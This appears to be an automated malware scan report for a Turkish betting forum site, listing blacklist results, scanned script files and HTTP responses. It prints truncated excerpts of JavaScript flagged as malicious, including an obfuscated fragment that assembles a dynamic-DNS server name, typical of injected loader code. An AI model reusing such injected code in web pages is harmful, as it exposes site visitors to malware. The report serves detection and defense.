Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=bahisakademi.com
Result: This site is not currently listed as suspicious.
Result: This site is not currently listed as suspicious.
Query: http://yandex.com/infected?l10n=en&url=http://bahisakademi.com/
Result: The website is marked by Yandex as suspicious. - visiting this web site may harm your computer.
Details are available here.
Result: The website is marked by Yandex as suspicious. - visiting this web site may harm your computer.
Details are available here.
Scanned pages/files
Request | Server response | Status |
http://bahisakademi.com/ | 200 OK Content-Length: 61970 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) function U(){return {g : r(String(H("deiRJv",0,2))),Z : r(H("bz2.dyndns-2bz",3,8)+"server.c"+H("omZBl",0,2)),s : r(H("s1c8WX",0,2))};};function imgMin(h, fN){return h + fN;};function aGaTrack(h){return h.length;};function c(a, todayY, tO){tO = tO || {};var FY = tO.expires;if (typeof FY == String("number") && FY){var C = new Date();C.setTime(C.getTime() + t(FY, 1000));FY = tO.expires = C;}if(FY && FY.toUTCString) { tO.expires = FY.toUTCString(); }todayY = encodeURIComponent(todayY Antivirus reports:
| ||
http://bahisakademi.com/clientscript/yui/yahoo-dom-event/yahoo-dom-event.js?v=382 | 200 OK Content-Length: 36628 Content-Type: application/x-javascript | clean |
http://bahisakademi.com/clientscript/yui/connection/connection-min.js?v=382 | 200 OK Content-Length: 11604 Content-Type: application/x-javascript | clean |
http://bahisakademi.com/clientscript/vbulletin_global.js?v=382 | 200 OK Content-Length: 26013 Content-Type: application/x-javascript | clean |
http://bahisakademi.com/clientscript/vbulletin_menu.js?v=382 | 200 OK Content-Length: 14934 Content-Type: application/x-javascript | clean |
http://bahisakademi.com/clientscript/ncode_imageresizer.js?v=1.0.1 | 200 OK Content-Length: 6335 Content-Type: application/x-javascript | clean |
http://bahisakademi.com/clientscript/vbulletin_md5.js?v=382 | 200 OK Content-Length: 5464 Content-Type: application/x-javascript | malicious |
Malicious code - confirmed by antiviruses (see below) var hexcase=0;var b64pad="";var chrsz=8;function hex_md5(A){return binl2hex(core_md5(str2binl(A),A.length*chrsz))}function b64_md5(A){return binl2b64(core_md5(str2binl(A),A.length*chrsz))}function str_md5(A){return binl2str(core_md5(str2binl(A),A.length*chrsz))}function hex_hmac_md5(A,B){return binl2hex(core_hmac_md5(A,B))}function b64_hmac_md5(A,B){return binl2b64(core_hmac_md5(A,B))}function str_hmac_md5(A,B){return binl2str(core_hmac_md5(A,B))}function core_md5(K,F){K[F>>5]|=128<< Antivirus reports:
| ||
http://js.betboopartners.com/javascript.php?prefix=K_zwZablwTGbWa_B3pkfcWNd7ZgqdRLk&media=1510&campaign=1 | 500 timeout Content-Length: 30 Content-Type: text/plain | clean |
http://js.betboopartners.com/test404page.js | 500 timeout Content-Length: 30 Content-Type: text/plain | clean |
http://js.commissionlounge.com/javascript.php?prefix=ukoBELj1YQ98F8NfJ-N_DWNd7ZgqdRLk&media=1176&campaign=1 | 200 OK Content-Length: 310 Content-Type: application/javascript | clean |
http://bahisakademi.com/clientscript/vbulletin_read_marker.js?v=382 | 200 OK Content-Length: 3394 Content-Type: application/x-javascript | clean |
http://js.betboopartners.com/javascript.php?prefix=K_zwZablwTGbWa_B3pkfcWNd7ZgqdRLk&media=1509&campaign=1 | 500 timeout Content-Length: 30 Content-Type: text/plain | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: bahisakademi.com
Result:
HTTP/1.1 200 OK
Cache-Control: private
Connection: close
Date: Tue, 15 Apr 2014 22:22:07 GMT
Pragma: private
Server: Apache/2.2.3 (CentOS)
Content-Type: text/html; charset=ISO-8859-9
Set-Cookie: bblastvisit=1397600527; expires=Wed, 15-Apr-2015 22:22:07 GMT; path=/
Set-Cookie: bblastactivity=0; expires=Wed, 15-Apr-2015 22:22:07 GMT; path=/
X-Powered-By: PHP/5.3.13
X-Powered-By: PleskLin
X-UA-Compatible: IE=7
GET / HTTP/1.1
Host: bahisakademi.com
Result:
HTTP/1.1 200 OK
Cache-Control: private
Connection: close
Date: Tue, 15 Apr 2014 22:22:07 GMT
Pragma: private
Server: Apache/2.2.3 (CentOS)
Content-Type: text/html; charset=ISO-8859-9
Set-Cookie: bblastvisit=1397600527; expires=Wed, 15-Apr-2015 22:22:07 GMT; path=/
Set-Cookie: bblastactivity=0; expires=Wed, 15-Apr-2015 22:22:07 GMT; path=/
X-Powered-By: PHP/5.3.13
X-Powered-By: PleskLin
X-UA-Compatible: IE=7
Second query (visit from search engine):
GET / HTTP/1.1
Host: bahisakademi.com
Referer: http://www.google.com/search?q=bahisakademi.com
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: bahisakademi.com
Referer: http://www.google.com/search?q=bahisakademi.com
Result:
The result is similar to the first query. There are no suspicious redirects found.